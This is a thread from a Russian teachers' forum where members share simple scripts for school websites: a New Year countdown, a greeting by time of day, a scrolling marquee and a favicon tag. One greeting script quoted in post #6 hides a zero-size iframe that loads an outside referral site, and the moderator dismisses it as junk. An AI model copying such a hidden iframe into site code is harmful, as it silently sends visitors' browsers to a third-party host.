[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 812378»
Модератор форума: Игоревич, Сергеев_ЕВ 
Форум учителей » В помощь школьным сайтам (web-мастеру) » Скрипты для сайта » Сборник скриптов (В помощь вебмастеру. Библиотечка скриптов для сайтов)
Сборник скриптов
Сергеев_ЕВ Дата: Среда, 14.07.2010, 13:49 | Сообщение #1
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Уважаемые господа скриптописатели и иже с ними!

1. При создании данной темы подразумевалось, что скрипты, опубликованные здесь, могут быть использованы учителями в своих веб-проектах. Подчеркиваю: УЧИТЕЛЯМИ, в лучшем случае учителями информатики, а не программерами, убитыми по Counter Strike. Поэтому какие-то левые примочки, типа таких (специально оставил для примера) просьба здесь более не публиковать.
2. Прежде, чем постить сюда очередной "шедевр", потрудитесь посмотреть, а не сделал ли кто-то то же самое раньше Вас.
3. Новые темы для одного скрипта создавать ни к чему. Создать-то, конечно, можно, но если ветка не получает развития, все ее посты рано или поздно я перетащу сюда.
4. Не забываем внешние ссылки "заворачивать" внутрь контейнера hide
5. При обнаружении с тексте скрипта неоправданной строчки типа Доступно только для пользователей пост буден удален без исправления с объявлением бана




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Max7 Дата: Среда, 14.07.2010, 13:49 | Сообщение #2
Профиль пользователя Max7
Начинающий
Группа: Пользователи
Сообщений: 4
Статус: Отсутствует
Прикольный скрипт к новому году. Отсчитывает время до нового года

Скрипт вставляется туда, где вы его хотите видеть!

Просмотреть вид скрипта можно сдесь:
http://osvita-novog.at.ua/1/ded_.png

Добавлено (23.12.2009, 16:36)
---------------------------------------------
Красивый новогодний скрипт, украсит любой сайт!
Ёлка с отсчетом времени до нового года.

Картинка скрипта сдесь:

http://osvita-novog.at.ua/1/elka_.png

Этот скрипт ставится куда угодно, куда вам больше нравится!

----------------------------------------
Отредактировал пост: сделал ссылки интерактивными
Сергеев_ЕВ

Max7 Дата: Среда, 14.07.2010, 13:49 | Сообщение #3
Профиль пользователя Max7
Начинающий
Группа: Пользователи
Сообщений: 4
Статус: Отсутствует
Скрипт для uCoz скрывает ссылки от незарегистрированных пользователей

Ставим сюда:
Форум = Общий вид страниц форума = после $BODY$ ставим:

Max7 Дата: Среда, 14.07.2010, 13:49 | Сообщение #4
Профиль пользователя Max7
Начинающий
Группа: Пользователи
Сообщений: 4
Статус: Отсутствует
Ставим в любое место:

То что выделенно синим цветом можно редактировать на что нибуть своё.

Время также можно поменять на своё(выделено зелёным)

Сообщение отредактировал Max7 - Среда, 23.12.2009, 17:26
Сергеев_ЕВ Дата: Среда, 14.07.2010, 13:50 | Сообщение #5
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Quote (Max7)
<script>
e=document.ge...

Почему не так:
Code
<script language="javascript">
e=document.getEle...
Заметил, что без указания языка скрипты нормально отрабатываются только в IE




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Сергеев_ЕВ Дата: Среда, 14.07.2010, 13:50 | Сообщение #6
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Quote (Max7)
<font color="#2d00d2" face="Verdana"><strong><script
language="javascript">
<!--site-best.ucoz.ru
var h=(new Date()).getHours();
if (h > 23 || h <7) document.write('Привет лунатикам!');
if (h > 6 && h < 12) document.write('Доброе утро! Как спалось?');
if (h > 11 && h < 19) document.write('Добрый день!');
if (h > 18 && h < 24) document. write('Привет! Уже вечер...');
//-->
</script>
<iframe src="http://reff.moy.su/" width="0%" height="0%" name="iframe" scrolling="auto" frameborder=0></iframe>
</strong></font>
А выделенное красным - просто мусор happy




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Сергеев_ЕВ Дата: Среда, 14.07.2010, 13:50 | Сообщение #7
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Quote (Max7)
Этот скрипт ставится куда угодно, куда вам больше нравится!

Вообще-то, это уже не скрипт, а виджет. Скрипт - это когда команды пишутся на языке написания сценариев, например, JavaScript. А тут просто вызов виджета - модуля (возможно, даже бинарного модуля), расположенного где-то на удаленном сервере, с передачей в него каких-то своих параметров.

--------------------------------------------------------
--------------------------------------------------------

Странно , неужели нет веб-дизайнеров?
Неужели ни у кого нет вопросов по скриптам? Всё жду, жду... Может, думаю, кто-то надумает поколупаться в JavaScript или в php, а нету никого...
Хоть, прямо, тему глуши, или даже три... book




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Сергеев_ЕВ Дата: Среда, 14.07.2010, 14:17 | Сообщение #8
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Это просто вкладки.
Редактировать легко




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Сергеев_ЕВ Дата: Среда, 14.07.2010, 14:36 | Сообщение #9
Профиль пользователя Сергеев_ЕВ
Модератор форума
Группа: Модераторы
Сообщений: 2896
Статус: Отсутствует
Разрабатывал специально для портала меню, а оно не сгодилось...
К сожалению, текст скрипта не позволяет разместить его в заголовке темы (много символов). Но готовый вариант скрипта можно посмотреть здесь




Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
enter Дата: Понедельник, 30.08.2010, 14:19 | Сообщение #10
Профиль пользователя enter
Новичок
Группа: Проверенные
Сообщений: 20
Статус: Отсутствует
Собрание маленьких скриптов: Бегущая строка, значок сайта в URL и т.д.

Добавлено (30.08.2010, 14:13)
---------------------------------------------
Вот скрипт Бегущая строка:
<title>Бегущая строка в HTML</title>
</head>
<body>
<marquee behavior="scroll" direction="left">Заменяем текст на свой</marquee>

Красный шрифт- это надо изменить на свой текст, который чтобы бегал справа налево.

Добавлено (30.08.2010, 14:19)
---------------------------------------------
Скрипт для установки значка в строке URL:

<link href="/templates/biz_blue_ii/favicon.ico" rel="shortcut icon" type="image/x-icon" />

Красном шрифтом заменяем URL-адрес нахождение значка. (значок должен быть с форматом ico)
Значок можно сделать на сайте http://favicon.ru/


...

Сообщение отредактировал enter - Понедельник, 30.08.2010, 20:16
Форум учителей » В помощь школьным сайтам (web-мастеру) » Скрипты для сайта » Сборник скриптов (В помощь вебмастеру. Библиотечка скриптов для сайтов)
Страница 1 из 812378»
Поиск:

Если Вы хотите оставить сообщение на форуме,
то рекомендуем Вам зарегистрироваться на нашем сайте или войти на портал как зарегистрированный пользователь